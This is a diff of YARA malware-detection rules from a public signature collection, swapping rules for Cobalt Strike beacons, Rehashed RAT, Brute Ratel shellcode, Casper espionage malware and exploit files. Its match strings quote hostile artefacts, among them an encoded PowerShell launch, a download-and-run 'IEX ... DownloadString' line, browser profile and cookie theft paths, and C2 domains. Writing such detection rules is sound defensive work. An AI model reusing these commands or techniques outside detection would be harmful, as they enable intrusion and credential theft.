-rule SIGNATURE_BASE_Malware_QA_Tls : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_LIBCUE_CVE_2023_43641_Oct23_1 : CVE_2023_43641 FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file tls.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3b654b1-73cf-5e04-a332-34777f646a66"
-		date = "2016-08-29"
+		description = "Detects a suspicious .cue file that could be an exploitation attempt of libcue vulnerability CVE-2023-43641"
+		author = "Florian Roth"
+		id = "34fcf80c-adcd-55c0-9fb4-261d20f61fa6"
+		date = "2023-10-27"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L71-L87"
+		reference = "https://github.com/github/securitylab/blob/main/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_libcue_cve_2023_43641.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20c849d8c60acd77a28244c7ebcbb2f96b233e74af6c52112a0c828e1de2ed84"
-		score = 80
+		logic_hash = "a2cd3c1b0b3551ffb24bf7704c37c1be6c1a9655c74447d2f7f94540dd0ab188"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f06d1f2bee2eb6590afbfa7f011ceba9bd91ba31cdc721bc728e13b547ac9370"
+		tags = "CVE-2023-43641, FILE"
 
 	strings:
-		$s1 = "\\funoverip\\ultimate-payload-template1\\" ascii
-		$s2 = "ULTIMATEPAYLOADTEMPLATE1" fullword wide
-		$s3 = "ultimate-payload-template1" fullword wide
+		$a1 = "TRACK "
+		$a2 = "FILE "
+		$s1 = "INDEX 4294"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Malware_QA_Get_The_Fucking_IP : FILE
+
+rule SIGNATURE_BASE_MAL_Floxif_Generic : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file get The FucKinG IP.exe"
+		description = "Detects Floxif Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c992fc5-79cf-532c-a18b-cfcc3406d6ed"
-		date = "2016-08-29"
+		id = "5ddd6a6c-b02a-518b-bbe3-8f528b3d7eae"
+		date = "2018-05-11"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L89-L107"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_floxif_flystudio.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab6a60142ef0e7a6e079a1b62da0b962dc3b59584b785516e93c74669574a81b"
+		logic_hash = "1996f717100d9f1abc2ed3f1e9d0c55daec09654c0f99987ddaea9e9f0d17008"
 		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b2c04e384919075be96e3412d92c14fc1165d1bc7556fd207488959c5c4d2f7"
-
-	strings:
-		$x1 = "C:\\Users\\Mdram ahmed\\AppData"
-		$x2 = "\\Local\\Temporary Projects\\get The FucKinG IP\\" ascii
-		$x3 = "get The FucKinG IP.exe" fullword wide
-		$x4 = "get ip by mdr3m" fullword wide
-		$x5 = "MDR3M kik: Mdr3mhm" fullword wide
+		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) )
 }
-rule SIGNATURE_BASE_Malware_QA_Vqgk : FILE
+
+rule SIGNATURE_BASE_MAL_CN_Flystudio_May18_1 : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file vqgk.dll"
+		description = "Detects malware / hacktool detected in May 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9246d9de-92e5-5cb8-857c-1e222c3d74d5"
-		date = "2016-08-29"
-		modified = "2022-12-21"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L109-L137"
+		id = "b78b9ea0-5eef-5922-b5d7-d3c5ddce7fad"
+		date = "2018-05-11"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_floxif_flystudio.yar#L21-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19b7099cdb8a984f1ba6cf88024db398a81ac4f4bf3c16cac40c5ee0e5b465fd"
-		score = 80
+		logic_hash = "8d03f02a270d8664175b65398c01ec4f0ea182437b31847f9bf4181edb0c36bb"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
+		hash1 = "b85147366890598518d4f277d44506eef871fd7fc6050d8f8e68889cae066d9e"
 
 	strings:
-		$x1 = "Z:\\devcenter\\aggressor\\external" ascii
-		$x2 = "\\beacon\\Release\\beacon.pdb" ascii
-		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$x4 = "%d is an x64 process (can't inject x86 content)" fullword ascii
-		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$s2 = "Could not open process token: %d (%u)" fullword ascii
-		$s3 = "\\\\%s\\pipe\\msagent_%x" fullword ascii
-		$s4 = "\\sysnative\\rundll32.exe" ascii
-		$s5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$s6 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$s7 = "could not write to process memory: %d" fullword ascii
-		$s8 = "beacon.dll" fullword ascii
-		$s9 = "Failed to impersonate token from %d (%u)" fullword ascii
+		$s1 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+		$s2 = "www.cfyhack.cn" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 7 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "65ae5cf17140aeaf91e3e9911da0ee3e" or 1 of them )
 }
-rule SIGNATURE_BASE_Malware_QA_1177 : FILE
+rule SIGNATURE_BASE_EXT_EXPL_ZTH_LNK_EXPLOIT_A : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file 1177.vbs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "363228c1-f9f8-5319-91b2-7eabdd1ca3f8"
-		date = "2016-08-29"
-		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L139-L161"
+		description = "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373."
+		author = "Peter Girnus"
+		id = "14788504-64e3-533b-ad21-00a3462a33cc"
+		date = "2025-03-18"
+		modified = "2025-03-29"
+		reference = "https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_lnk_zdi_can_25373.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0fa8e6c048bcc51553e8078a71416013696dd937c1508cd636873eab56c3797f"
-		score = 80
-		quality = 81
+		logic_hash = "b2c6a7f0abd62d3eef916352f984d1fcc721cfba4f5de9d159de8fd428c02b31"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ff3a2740330a6cbae7888e7066942b53015728c367cf9725e840af5b2a3fa247"
 
 	strings:
-		$x1 = ".specialfolders (\"startup\") & \"\\ServerName.EXE\"" fullword ascii
-		$x2 = "expandenvironmentstrings(\"%%InsallDir%%\") " ascii
-		$s1 = "CreateObject(\"WScript.Shell\").Run(" ascii
-		$s2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA" ascii
-		$s3 = "cial Thank's to Dev-point.com" fullword ascii
-		$s4 = ".createElement(\"tmp\")" fullword ascii
-		$s5 = "'%CopyToStartUp%" fullword ascii
+		$spoof_a = {20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00}
+		$spoof_b = {09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00}
+		$spoof_c = {0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00}
+		$spoof_d = {0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00}
+		$spoof_e = {11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00}
+		$spoof_f = {12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00}
+		$spoof_g = {13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00}
+		$spoof_h = {0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00}
 
 	condition:
-		( uint16( 0 ) == 0x4d27 and filesize < 100KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+		uint32( 0 ) == 0x4C and uint32( 4 ) == 0x21401 and any of ( $spoof_* )
 }
-rule SIGNATURE_BASE_Custom_Ssh_Backdoor_Server
+
+rule SIGNATURE_BASE_Rehashed_RAT_1 : FILE
 {
 	meta:
-		description = "Custome SSH backdoor based on python and paramiko - file server.py"
+		description = "Detects malware from Rehashed RAT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eccf705b-b2c3-5af6-ab86-70292089812b"
-		date = "2015-05-14"
-		modified = "2022-08-18"
-		reference = "https://goo.gl/S46L3o"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backdoor_ssh_python.yar#L2-L17"
+		id = "24536421-3f8f-58f3-8245-06c519d7a21a"
+		date = "2017-09-08"
+		modified = "2023-12-05"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
-		logic_hash = "7bb142b69a75003e8f26d462c0895a3d807d5c326684e83d756178a3b91669dc"
+		logic_hash = "06a98e87d931bdea697a2cf3de604f03654f9aa2b3f2346e78ba92e492c0fc7c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "37bd97779e854ea2fc43486ddb831a5acfd19cf89f06823c9fd3b20134cb1c35"
 
 	strings:
-		$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
-		$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
-		$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
+		$x1 = "C:\\Users\\hoogle168\\Desktop\\"
+		$x2 = "\\NewCoreCtrl08\\Release\\NewCoreCtrl08.pdb" ascii
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729" ascii
+		$s2 = "NewCoreCtrl08.dll" fullword ascii
+		$s3 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
+		$s4 = "http://%s:%d/%s%s%s%s" fullword ascii
+		$s5 = "MyTmpFile.Dat" fullword wide
+		$s6 = "root\\%s" fullword wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and ( pe.imphash ( ) == "893212784d01f11aed9ebb42ad2561fc" or pe.exports ( "ProcessTrans" ) or ( 1 of ( $x* ) or 4 of them ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Dubseven_File_Set : FILE
+
+rule SIGNATURE_BASE_Rehashed_RAT_2 : FILE
 {
 	meta:
-		description = "Searches for service files loading UP007"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "5b0a9cb9-aeef-5508-8854-51ad846b22c5"
-		date = "2016-04-18"
+		description = "Detects malware from Rehashed RAT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fcf82155-10da-56b7-879b-841c4ae5023b"
+		date = "2017-09-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L1-L29"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L41-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "af98ab901ca97a350aa837779d74208a780b1099e113cfa59bee2eb33690918e"
+		logic_hash = "96c4582981792eb5f8180c06a5fe824fd439cfa0ede294eccff3afa7d318a6e9"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966"
 
 	strings:
-		$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
-		$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
-		$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
-		$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
-		$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
-		$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
-		$file7 = "\\Microsoft\\Internet Explorer\\mon"
-		$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
+		$x1 = "dalat.dulichovietnam.net" fullword ascii
+		$x2 = "web.Thoitietvietnam.org" fullword ascii
+		$a1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)" fullword ascii
+		$a2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
+		$s1 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
+		$s2 = "http://%s:%d/%s%s%s%s" fullword ascii
+		$s3 = "{521338B8-3378-58F7-AFB9-E7D35E683BF8}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 3 of ( $file* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "9c4c648f4a758cbbfe28c8850d82f931" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Dubseven_Dropper_Registry_Checks : FILE
+rule SIGNATURE_BASE_Rehashed_RAT_3 : FILE
 {
 	meta:
-		description = "Searches for registry keys checked for by the dropper"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "8369cdbb-53b8-5dc5-9181-fd49747042a7"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L31-L57"
+		description = "Detects malware from Rehashed RAT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "59871be1-295f-54ee-ab4d-4f9e5fdc2935"
+		date = "2017-09-08"
+		modified = "2022-12-21"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L69-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "813ff641a4213cf9d56013768e284e7f622a223c6c4f585c3bbbcf69fc03723c"
+		logic_hash = "46f21f11959f863c85a1cfac74a28ba86d5b9789fea5a428168d157c13cce022"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9cebae97a067cd7c2be50d7fd8afe5e9cf935c11914a1ab5ff59e91c1e7e5fc4"
 
 	strings:
-		$reg1 = "SOFTWARE\\360Safe\\Liveup"
-		$reg2 = "Software\\360safe"
-		$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
-		$reg4 = "SOFTWARE\\Avira\\Avira Destop"
-		$reg5 = "SOFTWARE\\rising\\RAV"
-		$reg6 = "SOFTWARE\\JiangMin"
-		$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
+		$x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" ascii
+		$s2 = "psisrndrx.ebd" fullword wide
+		$s3 = "pbad exception" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of ( $reg* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Dubseven_Dropper_Dialog_Remains : FILE
+rule SIGNATURE_BASE_Saudi_Phish_Trojan : FILE
 {
 	meta:
-		description = "Searches for related dialog remnants. How rude."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "6029ea74-26fc-57d1-aaed-be1ea2138844"
-		date = "2016-04-18"
+		description = "Detects a trojan used in Saudi Aramco Phishing"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d805391d-1256-5dac-8585-ccf3391d4e91"
+		date = "2017-10-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L59-L80"
+		reference = "https://goo.gl/Z3JUAA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_saudi_aramco_phish.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "322ddc1210b6bde393970c61113e6efcb87a3529db386323dfd08973e5d2703e"
+		logic_hash = "f7199d2e408cc057d88234e4041c7d87652d1ed361eaaf75bb37da45900e9f38"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91"
 
 	strings:
-		$dia1 = "fuckMessageBox 1.0" wide
-		$dia2 = "Rundll 1.0" wide
+		$s1 = { 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09
+               2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00
+               70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00
+               70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00
+               65 00 78 00 65 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Maindll_Mutex : FILE
+
+rule SIGNATURE_BASE_Brc4_Shellcode
 {
 	meta:
-		description = "Matches on the maindll mutex"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "7a89dae3-9e03-5803-9729-78e6e65e91d3"
-		date = "2016-04-18"
+		description = "Hunts for shellcode opcode used in Badger x86/x64 till release v1.2.9"
+		author = "@ninjaparanoid"
+		id = "7e899d2f-332b-53f7-b9e6-cfde2bce6223"
+		date = "2022-11-19"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L83-L103"
+		reference = "https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/brc4.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_bruteratel_c4.yar#L263-L290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d3311164104198e02e700c2e9a5293e55d75d63b39c75c4e375b7f35eb5fde4"
+		logic_hash = "a2816eb0316cebc96569847c17eae3bc50b988b07aa471176a09695fcefc21ec"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 83
+		tags = ""
+		version = "last version"
+		arch_context = "x64"
 
 	strings:
-		$mutex = "h31415927tttt"
+		$shellcode_x64_Start = { 55 50 53 51 52 56 57 41 50 41 51 41 52 41 53 41 54 41 55 41 56 41 57 }
+		$shellcode_x64_End = { 5B 5E 5F 41 5C 41 5D 41 5E 41 5F 5D C3 }
+		$shellcode_x64_StageEnd = { 5C 41 5F 41 5E 41 5D 41 5C 41 5B 41 5A 41 59 41 58 5F 5E 5A 59 5B 58 5D C3 }
+		$funcHash1 = { 5B BC 4A 6A }
+		$funcHash2 = { 5D 68 FA 3C }
+		$funcHash3 = { AA FC 0D 7C }
+		$funcHash4 = { 8E 4E 0E EC }
+		$funcHash5 = { B8 12 DA 00 }
+		$funcHash6 = { 07 C4 4C E5 }
+		$funcHash7 = { BD CA 3B D3 }
+		$funcHash8 = { 89 4D 39 8C }
+		$hashFuncx64 = { EB 20 0F 1F 44 00 00 44 0F B6 C8 4C 89 DA 41 83 E9 20 4D 63 C1 4B 8D 04 10 49 39 CB 74 21 49 83 C3 01 41 89 C2 }
+		$hashFuncx86 = { EB 07 8D 74 26 00 83 C2 01 0F B6 31 C1 C8 0D 89 F1 8D 5C 30 E0 01 F0 80 F9 61 89 D1 0F 43 C3 39 D7 75 E3 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
+		(pe.machine == pe.MACHINE_AMD64 and ( 2 of ( $shellcode* ) or all of ( $funcHash* ) and $hashFuncx64 ) ) or ( pe.machine == pe.MACHINE_I386 and ( all of ( $funcHash* ) and $hashFuncx86 ) )
 }
-rule SIGNATURE_BASE_Slserver_Dialog_Remains : FILE
+rule SIGNATURE_BASE_Casper_Backdoor_X86 : FILE
 {
 	meta:
-		description = "Searches for related dialog remnants."
-		author = "Matt Brooks, @cmatthewbrooks / modified by Florian Roth"
-		id = "cf199d25-ce5e-52c2-88de-32a48dee4c6f"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L106-L136"
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9e54f00c-74a7-56cc-87e5-8dec1233cbb5"
+		date = "2015-03-05"
+		modified = "2023-01-27"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L4-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b18f4a6c54b456ae697e9639e8c3041fd4f3141d89850c3e1d3d4e220c3cea3"
-		score = 75
+		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+		logic_hash = "027457a3d86c0a7924fd6eb09c4a753cc846ba45f0b04257d9eec396bbc27f75"
+		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$slserver = "SLServer" wide fullword
-		$fp1 = "Dell Inc." wide fullword
-		$fp2 = "ScriptLogic Corporation" wide
-		$extra1 = "SLSERVER" wide fullword
-		$extra2 = "\\SLServer.pdb" ascii
+		$s1 = "\"svchost.exe\"" fullword wide
+		$s2 = "firefox.exe" fullword ascii
+		$s3 = "\"Host Process for Windows Services\"" fullword wide
+		$x1 = "\\Users\\*" ascii
+		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii
+		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii
+		$x4 = "\\Documents and Settings\\*" ascii
+		$y1 = "%s; %S=%S" fullword wide
+		$y2 = "%s; %s=%s" fullword ascii
+		$y3 = "Cookie: %s=%s" fullword ascii
+		$y4 = "http://%S:%d" fullword wide
+		$z1 = "http://google.com/" ascii
+		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+		$z3 = "Operating System\"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and not 1 of ( $fp* ) and 1 of ( $extra* ) and $slserver
+		( filesize < 250KB and all of ( $s* ) ) or ( 3 of ( $x* ) and 2 of ( $y* ) and 2 of ( $z* ) )
 }
-rule SIGNATURE_BASE_Slserver_Mutex : FILE
+rule SIGNATURE_BASE_Casper_EXE_Dropper
 {
 	meta:
-		description = "Searches for the mutex."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "decdefd0-fe20-5adf-9d8c-0e2b954481a0"
-		date = "2016-04-18"
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a901d045-6f9b-57e8-8347-6f78178b7231"
+		date = "2015-03-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
